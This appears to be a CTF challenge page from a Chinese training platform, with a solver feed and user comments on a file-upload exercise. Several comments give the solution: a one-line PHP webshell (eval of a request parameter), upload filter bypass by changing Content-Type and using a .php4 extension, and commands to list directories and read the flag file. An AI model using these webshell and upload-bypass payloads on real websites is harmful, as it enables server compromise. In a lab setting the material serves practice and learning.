评分(19)
解题动态
ylove 攻破了该题 15小时前
747137939 攻破了该题 1天前
momocanxue 攻破了该题 1天前
YS_JW 攻破了该题 1天前
liul6 攻破了该题 1天前
57 攻破了该题 2天前
wujita01 攻破了该题 2天前
zhuguangsen 攻破了该题 2天前
锅碗瓢盆 攻破了该题 2天前
nanaqilin 攻破了该题 2天前
names 攻破了该题 2天前
hsk_zy 攻破了该题 3天前
aaa1 攻破了该题 3天前
mmhhdm 攻破了该题 3天前
finsh 攻破了该题 3天前
TNF 攻破了该题 3天前
脚本gay 攻破了该题 5天前
犯困 攻破了该题 6天前
Cooper.juice 攻破了该题 7天前
评论
爱喝畅汁 21天前
举报
随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可
是小白鸭 1月前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)
李逍遥逛霍格沃茨 2月前
举报
能不能退金币 真被恶心到了
李逍遥逛霍格沃茨 2月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
李逍遥逛霍格沃茨 2月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
yuxuanlve 3月前
举报
为什么蚁剑死活连不上啊,改该的都改了啊,哥斯拉也连不上,评论全都看了一遍也没找到解决方案😭
ctfcaiji9527 3月前
举报
发现个问题,用yakit死活传不上去,用BP就行。( ╯□╰ )
jetxi 5月前
举报
php4和类型修改就可以绕过,可以放命令执行,或者直接蚁剑连,flag在根目录 data={'pass':"system('cat /flag');"}
desireart 6月前
举报
不知道,也没啥用,这种事情知道再多也没用,这辈子都知道不完
kaiyafanfan123 8月前
举报
而且正常图片上传,multipart/form-data 就合适